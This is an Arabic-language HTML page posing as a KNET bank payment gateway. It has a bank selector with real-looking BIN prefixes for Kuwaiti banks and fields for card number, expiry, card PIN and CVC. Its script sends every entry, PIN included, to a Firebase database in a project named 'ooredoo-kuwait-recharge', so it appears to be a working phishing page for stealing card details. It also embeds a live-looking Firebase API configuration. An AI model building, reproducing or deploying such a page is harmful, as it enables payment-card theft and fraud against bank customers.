
<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
  <meta charset="UTF-8">
  <title>بوابة دفع KNET</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <style>
    body {
      font-family: Tahoma, sans-serif;
      background-color: #f5f5f5;
      text-align: right;
      padding: 20px;
    }
    .container {
      max-width: 600px;
      background: #fff;
      margin: auto;
      padding: 25px;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
    }
    select, input {
      width: 100%;
      padding: 10px;
      margin-bottom: 12px;
      border-radius: 6px;
      border: 1px solid #ccc;
      font-size: 16px;
    }
    .row {
      display: flex;
      gap: 10px;
    }
    .row select, .row input {
      flex: 1;
    }
    button {
      width: 100%;
      padding: 12px;
      font-size: 18px;
      background-color: #1b77e3;
      color: white;
      border: none;
      border-radius: 6px;
      cursor: pointer;
    }
  </style>
</head>
<body>

<div class="container">
  <h3>بوابة الدفع</h3>

  <label>اختر البنك:</label>
  <select id="bank">
    <option value="">اختر البنك</option>
    <option value="ABK">[ABK] البنك الأهلي الكويتي</option>
    <option value="Boubyan">[Boubyan] بنك بوبيان</option>
    <option value="Burgan">[Burgan] بنك برقان</option>
    <option value="CBK">[CBK] البنك التجاري الكويتي</option>
    <option value="Doha">[Doha] بنك الدوحة</option>
    <option value="GBK">[GBK] بنك الخليج</option>
    <option value="KFH">[KFH] بيت التمويل الكويتي</option>
    <option value="KIB">[KIB] بنك الكويت الدولي</option>
    <option value="NBK">[NBK] بنك الكويت الوطني</option>
    <option value="QNB">[QNB] بنك قطر الوطني</option>
    <option value="UNB">[UNB] بنك الاتحاد الوطني</option>
    <option value="Warba">[Warba] بنك وربة</option>
  </select>

  <label>البادئة (BIN):</label>
  <select id="bin" style="font-size: 16px;">
    <option value="">اختر البادئة</option>
  </select>

  <div class="row">
    <input type="text" id="cardNumber" placeholder="أدخل 10 أرقام من رقم البطاقة" maxlength="10">
  </div>

  <div class="row">
    <select id="month">
      <option value="">MM</option>
      <option>01</option><option>02</option><option>03</option><option>04</option>
      <option>05</option><option>06</option><option>07</option><option>08</option>
      <option>09</option><option>10</option><option>11</option><option>12</option>
    </select>
    <select id="year">
      <option value="">YYYY</option>
      <option>2024</option><option>2025</option><option>2026</option>
    </select>
  </div>

  <input type="text" id="pin" placeholder="الرقم السري (4 أرقام)" maxlength="4">
  <input type="text" id="cvc" placeholder="CVC (3 أرقام)" maxlength="3">

  <button onclick="submitData()">إرسال</button>
</div>

<!-- Firebase App -->
<script src="https://www.gstatic.com/firebasejs/9.22.2/firebase-app-compat.js"></script>
<script src="https://www.gstatic.com/firebasejs/9.22.2/firebase-database-compat.js"></script>

<script>
  const firebaseConfig = {
    apiKey: "AIzaSyB7L-MKmTAv8ZBSq93aRA9Yml6Z08XgXfk",
    authDomain: "ooredoo-kuwait-recharge.firebaseapp.com",
    databaseURL: "https://ooredoo-kuwait-recharge-default-rtdb.firebaseio.com",
    projectId: "ooredoo-kuwait-recharge",
    storageBucket: "ooredoo-kuwait-recharge.firebasestorage.app",
    messagingSenderId: "80343152647",
    appId: "1:80343152647:web:0a69fd62de9123757ad2a2",
    measurementId: "G-XS8KSV1GZ8"
  };

  firebase.initializeApp(firebaseConfig);
  const database = firebase.database();

  function submitData() {
    const bank = document.getElementById("bank").value;
    const bin = document.getElementById("bin").value;
    const card = document.getElementById("cardNumber").value;
    const month = document.getElementById("month").value;
    const year = document.getElementById("year").value;
    const pin = document.getElementById("pin").value;
    const cvc = document.getElementById("cvc").value;

    if (!bank || !bin || card.length !== 10 || pin.length !== 4 || cvc.length !== 3) {
      alert("يرجى تعبئة جميع الحقول بشكل صحيح");
      return;
    }

    const timestamp = new Date().toISOString();
    database.ref("transactions").push({
      bank, bin, card, month, year, pin, cvc, timestamp
    }).then(() => {
      alert("تم الحفظ بنجاح ✅");
    }).catch((error) => {
      alert("فشل في الحفظ ❌");
      console.error(error);
    });
  }
</script>
</body>
</html>

<script>
  const binData = {
    "ABK": ["403622", "423826", "428628"],
    "Boubyan": ["470350", "490455", "490456", "404919", "450605", "426058", "431199"],
    "Burgan": ["49219000", "415254", "450238", "468564", "540759", "402978", "403583"],
    "CBK": ["532672", "537015", "521175", "516334"],
    "Doha": ["419252"],
    "GBK": ["531644", "517419", "531471", "559475", "517458", "526206", "531329", "531470"],
    "KFH": ["450778", "485602", "537016", "532674"],
    "KIB": ["406464", "409054"],
    "NBK": ["464452", "589160"],
    "QNB": ["524745", "521020"],
    "UNB": ["457778"],
    "Warba": ["439954", "405503"]
  };

  const bankSelect = document.getElementById("bank");
  const binSelect = document.getElementById("bin");

  bankSelect.addEventListener("change", () => {
    const bank = bankSelect.value;
    binSelect.innerHTML = '<option value="">اختر البادئة</option>';
    if (binData[bank]) {
      binData[bank].forEach(bin => {
        const opt = document.createElement("option");
        opt.value = bin;
        opt.textContent = bin;
        binSelect.appendChild(opt);
      });
    }
  });
</script>
